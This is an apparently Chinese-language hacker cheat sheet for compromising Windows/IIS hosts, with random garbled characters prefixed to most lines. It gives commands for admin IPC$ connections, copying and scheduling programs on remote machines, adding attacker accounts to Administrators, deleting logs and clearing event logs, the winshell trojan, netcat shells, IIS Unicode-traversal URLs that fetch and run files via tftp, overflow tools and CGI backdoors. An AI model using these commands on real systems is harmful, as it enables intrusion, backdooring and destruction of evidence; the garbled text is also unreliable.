网管和黑客都必须知道的命令
s C�e7n�i� 常用的几条NET命令:
kNI m�90,g 7��t��\kof (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
��"l�tvD�\ =oluw|TCe7 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
���)"&-vg< >R���HK6c� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
e[�i&2�m�M
p[0W�s460 (查看远程主机时间) net time \\IP地址
g�o]d+lhFB |^S[Gr� w� (定时启动某个程序) at \\IP地址 02:18 readme.exe
�gET& +M�� ��!__��f� (查看共享) net view \\IP地址
U�m�v�_{n` ;�G0~f�9� (查看netbios工作组列表) nbtstat -A IP地址
5��BS�-q"� a,d�\�<�mx (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
����B�C(f1 L �-��b~#� (这两条把自己增加到管理员组): net user 用户名 密码 /add
W$�EX6jTGI �lDe9E�J�R net localgroup Administrators 用户名 /add
�/_�*��:� To�]WCFp6@ (断开连接) net use \\IP地址\ipc$ /delete
A{>]�M@QC2 K�FA����B 扫尾:
,T|i�A/c�� k|BY�� �7C del C:\winnt\system32\logfiles\*.*
5`�^"�<wNI pP{b�!��1� del C:\winnt\ssytem32\config\*.evt
01H3@�0Q6 iF�F/��[P� del C:\winnt\system32\dtclog\*.*
uji])e MN~ q�I<*��Cze del C:\winnt\system32\*.log
U(3LeS;�mr &4�O"Xs`ka del C:\winnt\system32\*.txt
BR*"�"�/3` q1�r\�60M� del C:\winnt\*.txt
}=?r`J+Ev; </b�WF�W~x del C:\winnt\*.log
7; T����S m;K�Mr6sO 一、netsvc.exe
M[��<O]�p6 m(�B6�FPjr 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
~i))Zc3,g\ ���b2U�[W# netsvc /list \\IP地址
*��fSa8CV� �8uyVx9C�0 netsvc schedule \\IP地址 /query
Gg5vf]VFo [<w�y��@W� netsvc \\IP地址 schedule /start
$N,��9�e�� 8'^eH1d��' 二、OpenTelnet.exe
f,t[`�0 va .I�F d���J 远程启动主机的Telnet服务,并绑定端口到7878,例如:
A.35WGu&:� K�o�/�_w_� OpenTelnet \\IP地址 用户名 密码 1 7878
ot_��jG�)� Q>Ta��aGc� 然后就可以telnet到主机的7878端口,进入DOS方式下:
�<@F4{��*� �OX��8j�CW telnet IP地址 7878
Q{��>�9Dg� o }�Tv^�>L 三、winshell.exe
�~{2@-�qcm /%)�M��l�G 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
XKks j!'B �`+"QhQ4�w p Path (查看winshell主程序的路径信息)
KO{}+�~,.6 �K�z$I�j�j b reBoot (重新启动机器)
~�\ie/}zYj ip1�j�Y!
� d shutDown (关闭机器)
bpUN8BI�[T ;p�AkdX&b� s Shell (执行后你就会看到可爱的“C:\>”)
^$�?�8!WE _QXo4�z!a8 x eXit (退出本次登录会话,此命令并不终止winshell的运行)
��QXXcJc~ c�^�Wm~"r CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
FAPgX�mFzx .�rxc"fR4_ 四、3389登陆器,GUI方式登录远程主机的
�Ig��N,]y (&n�jZdcb* 五、elsave.exe
�;GH(A=}/Y fF�-V=Zf5� 事件日志清除工具
V#�3�VRh�� ;`F0
��%0d elsave -s \\IP地址 -l "application" -C
R��L)'���m )�}�?dY�k� elsave -s \\IP地址 -l "system" -C
qIb�(uF@l" �la�Fk�OQI elsave -s \\IP地址 -l "security" -C
zQ)[r���e) {K[+nX�=�# 执行后成功清除应用程序日志,系统日志,安全日志
��8d Ftp3( �2{U4w�Tu 六、hbulot.exe
��N3x}YHFF W_i�P/�xL� 开启win2kserver和winxp的3389服务
rW�bL�_1Eq ]^� Rgz�K� hbulot [/r]
d�%�]7�:� �h[X�GF�z� 使用/r表示安装完成后自动重起目标使设置生效。
9^c_^-8n<} �Z�O}V}�3 七、nc.exe(netcat.exe)
-09<�; �U� 78 UT]<Q;K 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
Y~J�q����! NugJjd56x� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
q07rWPM
"e 0�_&oM��PY 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�r@ejU'uz� xmVK{Q YT$ 参数:
8,[�'��q~z FEd�y��h?$ -e prog 程序重定向,一旦连接,就执行 [危险!!]
c)E'',-J_2 �j&44wu�f� -g gateway source-routing hop point[s], up to 8
�B��\<zU�� �9�cj=Cu�E -G num source-routing pointer: 4, 8, 12, ...
2�V~Yb1P� ��u$a%�{46 -h 帮助信息
]?�<uf40Mm 34P?��nW�( -i secs 延时的间隔
�[q(�7J�v� $6Ty~.RP5H -l 监听模式,用于入站连接
7L]fCw
p[� �b��g�EU�G -n 指定数字的IP地址,不能用hostname
A#8/:t1�AW 'et�CI�l3� -o file 记录16进制的传输
�xNm<` Y?� +'lfW�{E1t -p port 本地端口号
��hw�C3�[' ~L}0)�FZ\9 -r 任意指定本地及远程端口
fx_�7B� �( �V�Bd.5�YW -s addr 本地源地址
Rr�R�CT.+E $�cK�9E�:v -u UDP模式
zL7+HY*�3o nR
,j1IUF -v 详细输出——用两个-v可得到更详细的内容
^KlMBKW�yB j~L{=ojz�% -w secs timeout的时间
43P?f+IYrk E�%40u.�0� -z 将输入输出关掉——用于扫描时
Yoaz�|7LS� 八、TFTPD32.EXE
=o5hD,�>�e $/p�d[�H[{ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
dc:�|)bK
M <M 7W�Wtmx http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
-4V1�s;QUZ '�;$�2�j�~ 然后可以直接令文件运行:
|y�qx�
]� v�U�~#6sl� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
*;4r|#�LG �_#-(�XQ�a 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
&&t4G��}*� 4}�=]QQoE� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
w#-r�l@JQ4 9]d$G$�Kv9 一、一 Xscan命令行运行参数说明:
�T>L6 X:d� �Z����p�WG 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
}_�Jai��4O \:O�5,�wf2 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
:~�`E��@`/ ��<.=����� xscan -file <主机列表文件名> <检测项目> [其他选项]
9�f�t�7�� J�Q0KXS Nr 其中<检测项目> 含义如下:
��'n.ATV,� p+y�U�!�Qj -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�K�u�FDkT! V!���~�uGf -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
+[D=2&�tmk B�Q".$(c
q -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
\O\onvE�a� r@iGM��Jx$ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
6Z��kus�20 rTK/WZ�s8 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
YY$K;t{d�k 6��g7 X1C [其他选项] 含义如下:
9 ?h)U|J?G [j-]n#E=9y -v: 显示详细扫描进度
Cee�?%NaTS ��n�CY�icB -p: 跳过Ping不通的主机
^
zo�"~�1� ��$|sRj!F� -o: 跳过没有检测到开放端口的主机
iP���I6 _h [UFLL:_s�C -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
